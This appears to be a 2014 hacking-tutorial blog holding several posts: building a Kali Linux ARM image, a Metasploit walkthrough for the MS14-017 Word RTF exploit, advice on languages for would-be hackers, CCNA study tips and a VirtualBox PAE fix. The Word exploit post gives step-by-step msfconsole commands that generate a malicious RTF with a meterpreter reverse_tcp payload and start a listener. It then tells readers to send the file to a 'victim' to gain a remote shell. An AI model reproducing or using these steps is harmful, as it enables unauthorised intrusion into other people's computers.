Wednesday, 11 June 2014

How to Create Kali Linux Custom ARM image For Samsung Mobile ?

- You will need to use the cross compilers from  github 

armel images (RPi) will use https://github.com/offensive-security/gcc-arm-eabi-linaro-4.6.2

armhf images will use https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7

A sample workflow would look similar to (armhf):

Steps:-

1.open Terminal Type The following Codes:-

mkdir ~/arm-stuff

cd ~/arm-stuff

git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7

export PATH=${PATH}:/root/arm-stuff/gcc-arm-linux-gnueabihf-4.7/bin

git clone https://github.com/offensive-security/kali-arm-build-scripts

cd ~/arm-stuff/kali-arm-build-scripts

./build-deps.sh


 ./chromebook-arm-samsung.sh 1.0


If you are on 32bit, after the script finishes running, you will have an image
file located in ~/arm-stuff/kali-arm-build-scripts/chromebook-1.0/ called
kali-1.0-chromebook.img and a sha1sum file for it.  **_You will need to use your own

preferred compression if you want to distribute it._**

that's It



Thursday, 5 June 2014

How to Hack Remote Victim PC with MS Office Document ??

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a list override count field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample.

Exploit Targets:-

Microsoft Office 2010 SP2 


Requirement:-

Attacker: kali Linux
Victim PC: Windows 7

steps :-

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms14_017_rtf

msf exploit (ms14_017_rtf)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms14_017_rtf)>set lhost 192.168.1.7 (IP of Local Host)
 
msf exploit (ms14_017_rtf)>exploit

After we successfully generate the malicious rtf File, it will stored on your local computer
/root/.msf4/local/msf.rtf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7 (lhost means local host)


exploit

Now send your msf.rtf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Video Tutorial:-

Wednesday, 4 June 2014

How To Become A Hacker : Basics Of Hacking ??


Why Programming

So the first question many people will ask is why should i learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All i need to know is how the tool works and what is the purpose of it ?. The Answer for the question is both an Yes and No, You can become a Pentester/Hacker without knowing any programming but how ever your not going to become a good pentester /Hacker.

*So Knowing Programming Will...

_Differentiate you from Script kiddies and Tool Lovers
_Help You in Understanding About Vulnerabilities
_Help You in writing Your own tools, scripts
_Help You in writing exploits, Shell codes etc
_Help You modifying Existing scripts, tools according to your needs

Which Programming Language to Learn ?

So now that you have understood the importance of knowing programming, The next question in your mind is which programming language should i learn, The answer for this question depends on your interests and goals

For Web App Pentesting /Hacking

*HTML
Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don't know HTML you should first learn it

*JAVAScript

Learning java script. Will help you understand the basics of Cross Site Scripting

*PHP/SQL

Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP

For Writing / Understanding Exploits, Shell Codes, Root kits etc

*C & C++

More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester

*Assembly

Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software's

For Building Tools And Scripts

*Python

Python is a very powerful high level language , Its Easy to learn and code, most of the tools and scripts for automation are written in Python . Knowing Python socket programming will help you a lot in Exploit writing

*Ruby

Ruby is an another language which is used to write scripts, tools. Metasploit Frame Work is written in Ruby. so learning ruby will help you understand the in and outs of msf

*Bash

Learning Bash is very Useful in writing small scripts for automation

Hope this info helps you

HOW TO PASS CCNA CERTIFICATION ??

All people in the world of networking will be probably be familiar with CCNA and CCNP certifications.
These are global certifications awarded by CISCO.

Getting a CCNA,CCNP will definitely help you to get a better job besides getting a foothold into Professional Networking Field.
Let’s see how we can prepare ourselves in a methodological manner for CISCO exams, this article is based on CCNA.

1)RESOURCE BOOKS:

->Cisco Press book ICND 1
-> Cisco Press book ICND 2
The ICND1 covers "Network Types, Network Media, Switching Fundamentals, TCP/IP, IP Addressing and Routing, WAN Technologies, Operating and Configuring IOS Devices, and Managing Network Environments."
The ICND2 covers "Extending Switched Networks with VLANS, Determining IP Routes, Managing IP traffic with Access Lists, Establishing Point-to-Point connections, and Establishing Frame Relay Connections."
The combined CCNA covers all topics covered under the ICND1 and ICND2.


2) "31 Days Before your CCNA Exam" by CISCO

This book written by Cisco itself is a great resource for a Bible book revision type before your exams to brush up your concepts.


3)->Switch/Hub simulator(example:GNS switch emulator). 

Purchasing switches and hubs for practical hands on can be quite expensive, besides lab study at the centre, you can use a virtual simulator software emulating these at your home too.


4)->"CCNAx Exam Prep" .For practicing exams at home

This book will give you an exam outline and how to go about for the exams..
Best of luck :|]

Sunday, 1 June 2014

How to fix PAE error In virtual Box ?

//Eroor:


A fatal error has occurred during virtual machine execution! The virtual machine will be powered off. Please copy the following error message using the clipboard to help diagnose the problem:
The guest is trying to switch to the PAE mode which is currently disabled by default in VirtualBox. PAE support can be enabled using the VM settings (System/Processor).
Error ID: PAEmode
Severity: Fatal Error


// Fix:-open virtualbox>settings>system>go to "processer ">check "Enable PAE/NX ">click OK 

that's it

restart virtualbox